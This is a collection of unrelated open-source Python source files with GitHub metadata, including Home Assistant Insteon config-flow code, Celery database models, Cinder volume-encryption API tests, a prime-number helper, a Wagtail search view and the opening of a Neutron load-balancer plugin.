                data[CONF_USERNAME] = user_input[CONF_USERNAME]
                data[CONF_PASSWORD] = user_input[CONF_PASSWORD]
            self.hass.config_entries.async_update_entry(self.config_entry, data=data)
            # Options are returned unchanged; only entry data was updated.
            return self.async_create_entry(
                title="",
                data={**self.config_entry.options},
            )
        data_schema = build_hub_schema(**self.config_entry.data)
        return self.async_show_form(
            step_id=STEP_CHANGE_HUB_CONFIG, data_schema=data_schema
        )
    async def async_step_add_override(self, user_input=None):
        """Add a device override."""
        errors = {}
        if user_input is not None:
            try:
                data = add_device_override({**self.config_entry.options}, user_input)
                # Notify the running integration so it picks up the override.
                async_dispatcher_send(self.hass, SIGNAL_ADD_DEVICE_OVERRIDE, user_input)
                return self.async_create_entry(title="", data=data)
            except ValueError:
                errors["base"] = "input_error"
        schema_defaults = user_input if user_input is not None else {}
        data_schema = build_device_override_schema(**schema_defaults)
        return self.async_show_form(
            step_id=STEP_ADD_OVERRIDE, data_schema=data_schema, errors=errors
        )
    async def async_step_add_x10(self, user_input=None):
        """Add an X10 device."""
        errors = {}
        if user_input is not None:
            options = add_x10_device({**self.config_entry.options}, user_input)
            async_dispatcher_send(self.hass, SIGNAL_ADD_X10_DEVICE, user_input)
            return self.async_create_entry(title="", data=options)
        schema_defaults = user_input if user_input is not None else {}
        data_schema = build_x10_schema(**schema_defaults)
        return self.async_show_form(
            step_id=STEP_ADD_X10, data_schema=data_schema, errors=errors
        )
    async def async_step_remove_override(self, user_input=None):
        """Remove a device override."""
        errors = {}
        options = self.config_entry.options
        if user_input is not None:
            options = _remove_override(user_input[CONF_ADDRESS], options)
            async_dispatcher_send(
                self.hass,
                SIGNAL_REMOVE_DEVICE_OVERRIDE,
                user_input[CONF_ADDRESS],
            )
            return self.async_create_entry(title="", data=options)
        data_schema = build_remove_override_schema(options[CONF_OVERRIDE])
        return self.async_show_form(
            step_id=STEP_REMOVE_OVERRIDE, data_schema=data_schema, errors=errors
        )
    async def async_step_remove_x10(self, user_input=None):
        """Remove an X10 device."""
        errors = {}
        options = self.config_entry.options
        if user_input is not None:
            options, housecode, unitcode = _remove_x10(user_input[CONF_DEVICE], options)
            async_dispatcher_send(
                self.hass, SIGNAL_REMOVE_X10_DEVICE, housecode, unitcode
            )
            return self.async_create_entry(title="", data=options)
        data_schema = build_remove_x10_schema(options[CONF_X10])
        return self.async_show_form(
            step_id=STEP_REMOVE_X10, data_schema=data_schema, errors=errors
        )
|
{
"content_hash": "baaa20cc9cd13152ce8dffcd5cb87f19",
"timestamp": "",
"source": "github",
"line_count": 370,
"max_line_length": 88,
"avg_line_length": 37.616216216216216,
"alnum_prop": 0.6108636298318724,
"repo_name": "nkgilley/home-assistant",
"id": "d9261a65c32d74352f99fc1ad0ef68993168a46a",
"size": "13918",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/insteon/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "51597279"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
from datetime import datetime
import sqlalchemy as sa
from celery import states
from celery.db.session import ResultModelBase
# See docstring of a805d4bd for an explanation for this workaround ;)
from celery.db.a805d4bd import PickleType
class Task(ResultModelBase):
    """Task result/status."""
    __tablename__ = "celery_taskmeta"
    __table_args__ = {"sqlite_autoincrement": True}
    # Surrogate primary key; ``task_id`` below is Celery's own identifier.
    id = sa.Column(sa.Integer, sa.Sequence("task_id_sequence"),
                   primary_key=True,
                   autoincrement=True)
    task_id = sa.Column(sa.String(255))
    # Stays PENDING until a worker reports progress.
    status = sa.Column(sa.String(50), default=states.PENDING)
    # Custom PickleType workaround from a805d4bd (see its docstring).
    result = sa.Column(PickleType, nullable=True)
    date_done = sa.Column(sa.DateTime, default=datetime.now,
                          onupdate=datetime.now, nullable=True)
    traceback = sa.Column(sa.Text, nullable=True)
    def __init__(self, task_id):
        self.task_id = task_id
    def to_dict(self):
        """Return a plain-dict view of this result row."""
        return {"task_id": self.task_id,
                "status": self.status,
                "result": self.result,
                "traceback": self.traceback}
    def __repr__(self):
        return "<Task %s state: %s>" % (self.task_id, self.status)
class TaskSet(ResultModelBase):
    """TaskSet result"""
    __tablename__ = "celery_tasksetmeta"
    __table_args__ = {"sqlite_autoincrement": True}
    # Surrogate primary key; ``taskset_id`` is Celery's own identifier.
    id = sa.Column(sa.Integer, sa.Sequence("taskset_id_sequence"),
                   autoincrement=True, primary_key=True)
    taskset_id = sa.Column(sa.String(255))
    # Consistency fix: use the a805d4bd workaround PickleType, as
    # Task.result does, instead of the plain sa.PickleType that slipped
    # in here (the module comment says the workaround is deliberate).
    result = sa.Column(PickleType, nullable=True)
    date_done = sa.Column(sa.DateTime, default=datetime.now,
                          nullable=True)
    def __init__(self, taskset_id, result):
        self.taskset_id = taskset_id
        self.result = result
    def to_dict(self):
        """Return a plain-dict view of this result row."""
        return {"taskset_id": self.taskset_id,
                "result": self.result}
    def __repr__(self):
        return u"<TaskSet: %s>" % (self.taskset_id, )
|
{
"content_hash": "c7d6e8c59cefe3e063fe5c6ee8f88b47",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 69,
"avg_line_length": 32.833333333333336,
"alnum_prop": 0.6142131979695431,
"repo_name": "mitsuhiko/celery",
"id": "0ff98b7a937ebce17058374df0cc4a3ccb50d570",
"size": "1970",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "celery/db/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "624101"
},
{
"name": "Shell",
"bytes": "5742"
}
],
"symlink_target": ""
}
|
import json
import webob
from cinder import context
from cinder import db
from cinder import test
from cinder.tests.api import fakes
from cinder.tests import fake_notifier
def return_volume_type_encryption(context, volume_type_id):
    """Stub DB hook that always returns the canned encryption spec."""
    encryption = stub_volume_type_encryption()
    return encryption
def stub_volume_type_encryption():
    """Build the canned encryption spec these tests share."""
    return {
        'cipher': 'fake_cipher',
        'control_location': 'front-end',
        'key_size': 256,
        'provider': 'fake_provider',
        'volume_type_id': 'fake_type_id',
    }
def volume_type_encryption_get(context, volume_type_id):
    """No-op stand-in for the DB API call; always yields None."""
    return None
class VolumeTypeEncryptionTest(test.TestCase):
_default_volume_type = {
'id': 'fake_type_id',
'name': 'fake_type',
}
    def setUp(self):
        """Set a fake host flag and reset the notifier between tests."""
        super(VolumeTypeEncryptionTest, self).setUp()
        self.flags(host='fake')
        self.api_path = '/v2/fake/os-volume-types/1/encryption'
        """to reset notifier drivers left over from other api/contrib tests"""
        fake_notifier.reset()
        self.addCleanup(fake_notifier.reset)
def _get_response(self, volume_type, admin=True,
url='/v2/fake/types/%s/encryption',
req_method='GET', req_body=None,
req_headers=None):
ctxt = context.RequestContext('fake', 'fake', is_admin=admin)
req = webob.Request.blank(url % volume_type['id'])
req.method = req_method
req.body = req_body
if req_headers:
req.headers['Content-Type'] = req_headers
return req.get_response(fakes.wsgi_app(fake_auth_context=ctxt))
def _create_type_and_encryption(self, volume_type, body=None):
if body is None:
body = {"encryption": stub_volume_type_encryption()}
db.volume_type_create(context.get_admin_context(), volume_type)
return self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
    def test_index(self):
        """GET on the encryption resource returns the stored spec."""
        self.stubs.Set(db, 'volume_type_encryption_get',
                       return_volume_type_encryption)
        volume_type = self._default_volume_type
        self._create_type_and_encryption(volume_type)
        res = self._get_response(volume_type)
        self.assertEqual(200, res.status_code)
        res_dict = json.loads(res.body)
        expected = stub_volume_type_encryption()
        self.assertEqual(expected, res_dict)
        db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
    def test_index_invalid_type(self):
        """GET for a volume type that was never created yields a 404."""
        volume_type = self._default_volume_type
        res = self._get_response(volume_type)
        self.assertEqual(404, res.status_code)
        res_dict = json.loads(res.body)
        expected = {
            'itemNotFound': {
                'code': 404,
                'message': ('Volume type %s could not be found.'
                            % volume_type['id'])
            }
        }
        self.assertEqual(expected, res_dict)
    def test_show_key_size(self):
        """GET on .../encryption/key_size returns that single field."""
        volume_type = self._default_volume_type
        self._create_type_and_encryption(volume_type)
        res = self._get_response(volume_type,
                                 url='/v2/fake/types/%s/encryption/key_size')
        res_dict = json.loads(res.body)
        self.assertEqual(200, res.status_code)
        self.assertEqual(256, res_dict['key_size'])
        db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
    def test_show_provider(self):
        """GET on .../encryption/provider returns that single field."""
        volume_type = self._default_volume_type
        self._create_type_and_encryption(volume_type)
        res = self._get_response(volume_type,
                                 url='/v2/fake/types/%s/encryption/provider')
        res_dict = json.loads(res.body)
        self.assertEqual(200, res.status_code)
        self.assertEqual('fake_provider', res_dict['provider'])
        db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
    def test_show_item_not_found(self):
        """GET on an unknown encryption field yields a 404."""
        volume_type = self._default_volume_type
        self._create_type_and_encryption(volume_type)
        res = self._get_response(volume_type,
                                 url='/v2/fake/types/%s/encryption/fake')
        res_dict = json.loads(res.body)
        self.assertEqual(404, res.status_code)
        expected = {
            'itemNotFound': {
                'code': 404,
                'message': ('The resource could not be found.')
            }
        }
        self.assertEqual(expected, res_dict)
        db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
    def _create(self, cipher, control_location, key_size, provider):
        """Create an encryption spec and verify response, DB and notifier."""
        volume_type = self._default_volume_type
        db.volume_type_create(context.get_admin_context(), volume_type)
        body = {"encryption": {'cipher': cipher,
                               'control_location': control_location,
                               'key_size': key_size,
                               'provider': provider,
                               'volume_type_id': volume_type['id']}}
        self.assertEqual(len(fake_notifier.NOTIFICATIONS), 0)
        res = self._get_response(volume_type)
        res_dict = json.loads(res.body)
        self.assertEqual(200, res.status_code)
        # Confirm that volume type has no encryption information
        # before create.
        self.assertEqual('{}', res.body)
        # Create encryption specs for the volume type
        # with the defined body.
        res = self._get_response(volume_type, req_method='POST',
                                 req_body=json.dumps(body),
                                 req_headers='application/json')
        res_dict = json.loads(res.body)
        # Exactly one notification should have been emitted by the create.
        self.assertEqual(len(fake_notifier.NOTIFICATIONS), 1)
        # check response
        self.assertIn('encryption', res_dict)
        self.assertEqual(cipher, res_dict['encryption']['cipher'])
        self.assertEqual(control_location,
                         res_dict['encryption']['control_location'])
        self.assertEqual(key_size, res_dict['encryption']['key_size'])
        self.assertEqual(provider, res_dict['encryption']['provider'])
        self.assertEqual(volume_type['id'],
                         res_dict['encryption']['volume_type_id'])
        # check database
        encryption = db.volume_type_encryption_get(context.get_admin_context(),
                                                   volume_type['id'])
        self.assertIsNotNone(encryption)
        self.assertEqual(cipher, encryption['cipher'])
        self.assertEqual(key_size, encryption['key_size'])
        self.assertEqual(provider, encryption['provider'])
        self.assertEqual(volume_type['id'], encryption['volume_type_id'])
        db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_create_json(self):
self._create('fake_cipher', 'front-end', 128, 'fake_encryptor')
    def test_create_xml(self):
        """Encryption create also works through the XML API."""
        volume_type = self._default_volume_type
        db.volume_type_create(context.get_admin_context(), volume_type)
        ctxt = context.RequestContext('fake', 'fake', is_admin=True)
        req = webob.Request.blank('/v2/fake/types/%s/encryption'
                                  % volume_type['id'])
        req.method = 'POST'
        req.body = ('<encryption provider="test_provider" '
                    'cipher="cipher" control_location="front-end" />')
        req.headers['Content-Type'] = 'application/xml'
        req.headers['Accept'] = 'application/xml'
        res = req.get_response(fakes.wsgi_app(fake_auth_context=ctxt))
        self.assertEqual(res.status_int, 200)
        db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
    def test_create_invalid_volume_type(self):
        """POSTing encryption for a nonexistent type yields a 404."""
        volume_type = self._default_volume_type
        body = {"encryption": stub_volume_type_encryption()}
        # Attempt to create encryption without first creating type
        res = self._get_response(volume_type, req_method='POST',
                                 req_body=json.dumps(body),
                                 req_headers='application/json')
        res_dict = json.loads(res.body)
        # No notification must be sent for the failed create.
        self.assertEqual(len(fake_notifier.NOTIFICATIONS), 0)
        self.assertEqual(404, res.status_code)
        expected = {
            'itemNotFound': {
                'code': 404,
                'message': ('Volume type %s could not be found.'
                            % volume_type['id'])
            }
        }
        self.assertEqual(expected, res_dict)
    def test_create_encryption_type_exists(self):
        """A second create for the same type is rejected with a 400."""
        volume_type = self._default_volume_type
        body = {"encryption": stub_volume_type_encryption()}
        self._create_type_and_encryption(volume_type, body)
        # Try to create encryption specs for a volume type
        # that already has them.
        res = self._get_response(volume_type, req_method='POST',
                                 req_body=json.dumps(body),
                                 req_headers='application/json')
        res_dict = json.loads(res.body)
        expected = {
            'badRequest': {
                'code': 400,
                'message': ('Volume type encryption for type '
                            'fake_type_id already exists.')
            }
        }
        self.assertEqual(expected, res_dict)
        db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
    def test_create_volume_exists(self):
        """Creating encryption is rejected while the type is in use."""
        # Create the volume type and a volume with the volume type.
        volume_type = self._default_volume_type
        db.volume_type_create(context.get_admin_context(), volume_type)
        db.volume_create(context.get_admin_context(),
                         {'id': 'fake_id',
                          'display_description': 'Test Desc',
                          'size': 20,
                          'status': 'creating',
                          'instance_uuid': None,
                          'host': 'dummy',
                          'volume_type_id': volume_type['id']})
        body = {"encryption": {'cipher': 'cipher',
                               'key_size': 128,
                               'control_location': 'front-end',
                               'provider': 'fake_provider',
                               'volume_type_id': volume_type['id']}}
        # Try to create encryption specs for a volume type
        # with a volume.
        res = self._get_response(volume_type, req_method='POST',
                                 req_body=json.dumps(body),
                                 req_headers='application/json')
        res_dict = json.loads(res.body)
        expected = {
            'badRequest': {
                'code': 400,
                'message': ('Cannot create encryption specs. '
                            'Volume type in use.')
            }
        }
        self.assertEqual(expected, res_dict)
        db.volume_destroy(context.get_admin_context(), 'fake_id')
        db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def _encryption_create_bad_body(self, body,
msg='Create body is not valid.'):
volume_type = self._default_volume_type
db.volume_type_create(context.get_admin_context(), volume_type)
res = self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
res_dict = json.loads(res.body)
expected = {
'badRequest': {
'code': 400,
'message': (msg)
}
}
self.assertEqual(expected, res_dict)
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_create_no_body(self):
self._encryption_create_bad_body(body=None)
def test_create_malformed_entity(self):
body = {'encryption': 'string'}
self._encryption_create_bad_body(body=body)
def test_create_negative_key_size(self):
body = {"encryption": {'cipher': 'cipher',
'key_size': -128,
'provider': 'fake_provider',
'volume_type_id': 'volume_type'}}
msg = 'Invalid input received: key_size must be non-negative'
self._encryption_create_bad_body(body=body, msg=msg)
def test_create_none_key_size(self):
self._create('fake_cipher', 'front-end', None, 'fake_encryptor')
def test_create_invalid_control_location(self):
body = {"encryption": {'cipher': 'cipher',
'control_location': 'fake_control',
'provider': 'fake_provider',
'volume_type_id': 'volume_type'}}
msg = ("Invalid input received: Valid control location are: "
"['front-end', 'back-end']")
self._encryption_create_bad_body(body=body, msg=msg)
def test_create_no_provider(self):
body = {"encryption": {'cipher': 'cipher',
'volume_type_id': 'volume_type'}}
msg = ("Invalid input received: provider must be defined")
self._encryption_create_bad_body(body=body, msg=msg)
def test_delete(self):
    """Deleting encryption specs removes them: GET is empty afterwards.

    Flow: GET (empty) -> POST specs -> GET (populated) -> DELETE ->
    GET (empty again).
    """
    volume_type = self._default_volume_type
    db.volume_type_create(context.get_admin_context(), volume_type)

    # Test that before create, there's nothing with a get
    res = self._get_response(volume_type)
    self.assertEqual(200, res.status_code)
    res_dict = json.loads(res.body)
    self.assertEqual({}, res_dict)

    body = {"encryption": {'cipher': 'cipher',
                           'key_size': 128,
                           'control_location': 'front-end',
                           'provider': 'fake_provider',
                           'volume_type_id': volume_type['id']}}

    # Create, and test that get returns something
    res = self._get_response(volume_type, req_method='POST',
                             req_body=json.dumps(body),
                             req_headers='application/json')
    res_dict = json.loads(res.body)

    res = self._get_response(volume_type, req_method='GET',
                             req_headers='application/json',
                             url='/v2/fake/types/%s/encryption')
    self.assertEqual(200, res.status_code)
    res_dict = json.loads(res.body)
    self.assertEqual(volume_type['id'], res_dict['volume_type_id'])

    # Delete, and test that get returns nothing
    # (DELETE answers 202 Accepted with an empty body)
    res = self._get_response(volume_type, req_method='DELETE',
                             req_headers='application/json',
                             url='/v2/fake/types/%s/encryption/provider')
    self.assertEqual(202, res.status_code)
    self.assertEqual(0, len(res.body))

    res = self._get_response(volume_type, req_method='GET',
                             req_headers='application/json',
                             url='/v2/fake/types/%s/encryption')
    self.assertEqual(200, res.status_code)
    res_dict = json.loads(res.body)
    self.assertEqual({}, res_dict)

    db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_delete_with_volume_in_use(self):
    """DELETE fails with 400 while volumes use the type, then succeeds.

    Two volumes of the encrypted type are created; the delete attempt is
    rejected until both volumes are destroyed.
    """
    # Create the volume type
    volume_type = self._default_volume_type
    db.volume_type_create(context.get_admin_context(), volume_type)

    body = {"encryption": {'cipher': 'cipher',
                           'key_size': 128,
                           'control_location': 'front-end',
                           'provider': 'fake_provider',
                           'volume_type_id': volume_type['id']}}

    # Create encryption with volume type, and test with GET
    res = self._get_response(volume_type, req_method='POST',
                             req_body=json.dumps(body),
                             req_headers='application/json')
    res = self._get_response(volume_type, req_method='GET',
                             req_headers='application/json',
                             url='/v2/fake/types/%s/encryption')
    self.assertEqual(200, res.status_code)
    res_dict = json.loads(res.body)
    self.assertEqual(volume_type['id'], res_dict['volume_type_id'])

    # Create volumes with the volume type
    db.volume_create(context.get_admin_context(),
                     {'id': 'fake_id',
                      'display_description': 'Test Desc',
                      'size': 20,
                      'status': 'creating',
                      'instance_uuid': None,
                      'host': 'dummy',
                      'volume_type_id': volume_type['id']})
    db.volume_create(context.get_admin_context(),
                     {'id': 'fake_id2',
                      'display_description': 'Test Desc2',
                      'size': 2,
                      'status': 'creating',
                      'instance_uuid': None,
                      'host': 'dummy',
                      'volume_type_id': volume_type['id']})

    # Delete, and test that there is an error since volumes exist
    res = self._get_response(volume_type, req_method='DELETE',
                             req_headers='application/json',
                             url='/v2/fake/types/%s/encryption/provider')
    self.assertEqual(400, res.status_code)
    res_dict = json.loads(res.body)
    expected = {
        'badRequest': {
            'code': 400,
            'message': 'Cannot delete encryption specs. '
                       'Volume type in use.'
        }
    }
    self.assertEqual(expected, res_dict)

    # Delete the volumes
    db.volume_destroy(context.get_admin_context(), 'fake_id')
    db.volume_destroy(context.get_admin_context(), 'fake_id2')

    # Delete, and test that get returns nothing
    res = self._get_response(volume_type, req_method='DELETE',
                             req_headers='application/json',
                             url='/v2/fake/types/%s/encryption/provider')
    self.assertEqual(202, res.status_code)
    self.assertEqual(0, len(res.body))

    res = self._get_response(volume_type, req_method='GET',
                             req_headers='application/json',
                             url='/v2/fake/types/%s/encryption')
    self.assertEqual(200, res.status_code)
    res_dict = json.loads(res.body)
    self.assertEqual({}, res_dict)

    db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_update_item(self):
    """PUT on the encryption specs updates them; GET reflects the change."""
    volume_type = self._default_volume_type

    # Create Encryption Specs
    create_body = {"encryption": {'cipher': 'cipher',
                                  'control_location': 'front-end',
                                  'key_size': 128,
                                  'provider': 'fake_provider',
                                  'volume_type_id': volume_type['id']}}
    self._create_type_and_encryption(volume_type, create_body)

    # Update Encryption Specs
    update_body = {"encryption": {'key_size': 512,
                                  'provider': 'fake_provider2'}}
    response = self._get_response(
        volume_type, req_method='PUT',
        req_body=json.dumps(update_body),
        req_headers='application/json',
        url='/v2/fake/types/%s/encryption/fake_type_id')
    updated = json.loads(response.body)['encryption']
    self.assertEqual(512, updated['key_size'])
    self.assertEqual('fake_provider2', updated['provider'])

    # Get Encryption Specs and confirm the update stuck
    fetched = json.loads(self._get_response(volume_type).body)
    self.assertEqual(512, fetched['key_size'])
    self.assertEqual('fake_provider2', fetched['provider'])

    db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def _encryption_update_bad_body(self, update_body, msg):
    """PUT a bad encryption-update body and verify the 400 payload."""
    # Create Volume Type and Encryption
    volume_type = self._default_volume_type
    self._create_type_and_encryption(volume_type)

    # Update Encryption
    response = self._get_response(
        volume_type, req_method='PUT',
        req_body=json.dumps(update_body),
        req_headers='application/json',
        url='/v2/fake/types/%s/encryption/fake_type_id')

    expected = {
        'badRequest': {
            'code': 400,
            'message': msg
        }
    }
    # Confirm Failure
    self.assertEqual(expected, json.loads(response.body))

    db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_update_too_many_items(self):
    """A body with more than one top-level item must be rejected."""
    self._encryption_update_bad_body(
        {"encryption": {'key_size': 512},
         "encryption2": {'key_size': 256}},
        'Request body contains too many items.')
def test_update_key_size_non_integer(self):
    """A non-integer key_size must be rejected on update."""
    self._encryption_update_bad_body(
        {"encryption": {'key_size': 'abc'}},
        'Invalid input received: key_size must be an integer')
def test_update_item_invalid_body(self):
    """An update body missing the 'encryption' key must be rejected."""
    self._encryption_update_bad_body(
        {"key_size": "value1"},
        'Update body is not valid. It must contain "encryption."')
def _encryption_empty_update(self, update_body):
    """Verify that an empty update body yields the standard 400 message."""
    self._encryption_update_bad_body(update_body, 'Request body empty.')
def test_update_no_body(self):
    """Updating with no body (None) must fail."""
    self._encryption_empty_update(None)
def test_update_empty_body(self):
    """Updating with an empty dict body must fail."""
    self._encryption_empty_update({})
def test_update_with_volume_in_use(self):
    """PUT on encryption specs fails with 400 while a volume uses the type."""
    # Create the volume type and encryption
    volume_type = self._default_volume_type
    self._create_type_and_encryption(volume_type)

    # Create a volume with the volume type
    db.volume_create(context.get_admin_context(),
                     {'id': 'fake_id',
                      'display_description': 'Test Desc',
                      'size': 20,
                      'status': 'creating',
                      'instance_uuid': None,
                      'host': 'dummy',
                      'volume_type_id': volume_type['id']})

    # Get the Encryption
    res = self._get_response(volume_type)
    self.assertEqual(200, res.status_code)
    res_dict = json.loads(res.body)
    self.assertEqual(volume_type['id'], res_dict['volume_type_id'])

    # Update, and test that there is an error since volumes exist
    update_body = {"encryption": {'key_size': 512}}
    res = self._get_response(volume_type, req_method='PUT',
                             req_body=json.dumps(update_body),
                             req_headers='application/json',
                             url='/v2/fake/types/%s/encryption/fake_type_id')
    self.assertEqual(400, res.status_code)
    res_dict = json.loads(res.body)
    expected = {
        'badRequest': {
            'code': 400,
            'message': 'Cannot update encryption specs. '
                       'Volume type in use.'
        }
    }
    self.assertEqual(expected, res_dict)
|
{
"content_hash": "6d974bb44aadc36559a7b97f0fb99718",
"timestamp": "",
"source": "github",
"line_count": 591,
"max_line_length": 79,
"avg_line_length": 40.653130287648054,
"alnum_prop": 0.5367934737367851,
"repo_name": "alex8866/cinder",
"id": "9bf1f9852acadaa5d51889db0e2f208c25d82b43",
"size": "24701",
"binary": false,
"copies": "12",
"ref": "refs/heads/f22-patches",
"path": "cinder/tests/api/contrib/test_volume_type_encryption.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PLpgSQL",
"bytes": "9824"
},
{
"name": "Python",
"bytes": "8519246"
},
{
"name": "Shell",
"bytes": "8429"
}
],
"symlink_target": ""
}
|
def is_prime(n):
    """Return True if n is prime, False otherwise.

    Fixes the original behaviour of reporting numbers below 2
    (0, 1 and negatives) as prime: by definition they are not.
    Trial division only needs to test divisors up to sqrt(n), which
    turns the O(n) scan into O(sqrt(n)).
    """
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True
def all_primes(n):
    """Return a list of all primes strictly below n.

    Fixes the original behaviour of listing 1 as a prime (the loop
    started at 1 and the helper accepted it). Implemented as a
    self-contained sieve of Eratosthenes: O(n log log n) instead of
    repeated trial division per candidate.
    """
    if n < 3:
        return []
    sieve = [True] * n
    sieve[0] = sieve[1] = False  # 0 and 1 are not prime
    limit = int(n ** 0.5) + 1
    for p in range(2, limit):
        if sieve[p]:
            # Multiples below p*p were already crossed out by smaller primes.
            for multiple in range(p * p, n, p):
                sieve[multiple] = False
    return [i for i in range(2, n) if sieve[i]]
|
{
"content_hash": "c0b691dfd31b88d824176624a93d6dcd",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 49,
"avg_line_length": 22.615384615384617,
"alnum_prop": 0.5578231292517006,
"repo_name": "Serulab/Py4Bio",
"id": "80f9bfb2f2298adca4bb2fbb9fa702375e6dc5db",
"size": "294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/ch6/allprimes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "616939"
},
{
"name": "Jupyter Notebook",
"bytes": "1260113"
},
{
"name": "Python",
"bytes": "533666"
},
{
"name": "Smarty",
"bytes": "1665"
},
{
"name": "TSQL",
"bytes": "3276"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from django.shortcuts import render
from django.http import JsonResponse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from wagtail.wagtailcore import models
from wagtail.wagtailsearch.models import Query
def search(
        request,
        template=None,
        template_ajax=None,
        results_per_page=10,
        use_json=False,
        json_attrs=None,
        show_unpublished=False,
        search_title_only=False,
        extra_filters=None,
        path=None):
    """Search pages and return rendered results or a JSON response.

    :param request: current HttpRequest; the query is read from the ``q``
        GET parameter and the page number from ``page`` (or ``p``).
    :param template: template for full-page results; falls back to
        ``settings.WAGTAILSEARCH_RESULTS_TEMPLATE`` or the wagtailsearch
        default template.
    :param template_ajax: template for AJAX requests; falls back to
        ``settings.WAGTAILSEARCH_RESULTS_TEMPLATE_AJAX`` or *template*.
    :param results_per_page: pagination page size.
    :param use_json: when True return a JsonResponse instead of rendering.
    :param json_attrs: page attributes included in the JSON payload;
        defaults to ``['title', 'url']``.
    :param show_unpublished: include unpublished pages when True.
    :param search_title_only: restrict the search to the title field.
    :param extra_filters: extra queryset filters applied before searching.
    :param path: page-tree path to search under; defaults to the current
        site's root page path.
    """
    # Default-argument fix: list/dict defaults are evaluated once at
    # definition time and shared between calls; use None sentinels so a
    # caller mutating the value cannot poison later requests.
    if json_attrs is None:
        json_attrs = ['title', 'url']
    if extra_filters is None:
        extra_filters = {}

    # Get default templates
    if template is None:
        if hasattr(settings, 'WAGTAILSEARCH_RESULTS_TEMPLATE'):
            template = settings.WAGTAILSEARCH_RESULTS_TEMPLATE
        else:
            template = 'wagtailsearch/search_results.html'

    if template_ajax is None:
        if hasattr(settings, 'WAGTAILSEARCH_RESULTS_TEMPLATE_AJAX'):
            template_ajax = settings.WAGTAILSEARCH_RESULTS_TEMPLATE_AJAX
        else:
            template_ajax = template

    # Get query string and page from GET parameters
    query_string = request.GET.get('q', '')
    page = request.GET.get('page', request.GET.get('p', 1))

    # Search
    if query_string != '':
        pages = models.Page.objects.filter(
            path__startswith=(path or request.site.root_page.path))

        if not show_unpublished:
            pages = pages.live()

        if extra_filters:
            pages = pages.filter(**extra_filters)

        if search_title_only:
            search_results = pages.search(query_string, fields=['title'])
        else:
            search_results = pages.search(query_string)

        # Get query object
        query = Query.get(query_string)

        # Add hit
        query.add_hit()

        # Pagination (invalid page -> first page, overflow -> last page)
        paginator = Paginator(search_results, results_per_page)
        try:
            search_results = paginator.page(page)
        except PageNotAnInteger:
            search_results = paginator.page(1)
        except EmptyPage:
            search_results = paginator.page(paginator.num_pages)
    else:
        query = None
        search_results = None

    if use_json:
        # Return a json response
        if search_results:
            search_results_json = []
            for result in search_results:
                result_specific = result.specific
                # Only include the attributes the specific page actually has.
                search_results_json.append(dict(
                    (attr, getattr(result_specific, attr))
                    for attr in json_attrs
                    if hasattr(result_specific, attr)
                ))
            return JsonResponse(search_results_json, safe=False)
        else:
            return JsonResponse([], safe=False)
    else:
        # Render a template
        if request.is_ajax() and template_ajax:
            template = template_ajax

        return render(request, template, dict(
            query_string=query_string,
            search_results=search_results,
            is_ajax=request.is_ajax(),
            query=query
        ))
|
{
"content_hash": "3a799ad261f4ef9bceaa36670b6d9e35",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 98,
"avg_line_length": 30.8265306122449,
"alnum_prop": 0.5958291956305859,
"repo_name": "JoshBarr/wagtail",
"id": "1680b4a21f5977059ee53208da5f58ce9fb10b6a",
"size": "3021",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "wagtail/wagtailsearch/views/frontend.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "152464"
},
{
"name": "HTML",
"bytes": "252508"
},
{
"name": "JavaScript",
"bytes": "94840"
},
{
"name": "Makefile",
"bytes": "548"
},
{
"name": "Python",
"bytes": "1839807"
},
{
"name": "Shell",
"bytes": "7388"
}
],
"symlink_target": ""
}
|
from neutron.api.v2 import attributes as attrs
from neutron.common import exceptions as n_exc
from neutron import context
from neutron.db import api as qdbapi
from neutron.db.loadbalancer import loadbalancer_db as ldb
from neutron.db import servicetype_db as st_db
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants
from neutron.services.loadbalancer import agent_scheduler
from neutron.services import provider_configuration as pconf
from neutron.services import service_base
# Module-level logger, named after this module.
LOG = logging.getLogger(__name__)
class LoadBalancerPlugin(ldb.LoadBalancerPluginDb,
                         agent_scheduler.LbaasAgentSchedulerDbMixin):
    """Implementation of the Neutron Loadbalancer Service Plugin.

    This class manages the workflow of LBaaS request/response.
    Most DB related works are implemented in class
    loadbalancer_db.LoadBalancerPluginDb.
    """
    supported_extension_aliases = ["lbaas",
                                   "lbaas_agent_scheduler",
                                   "service-type"]

    # lbaas agent notifiers to handle agent update operations;
    # can be updated by plugin drivers while loading;
    # will be extracted by neutron manager when loading service plugins;
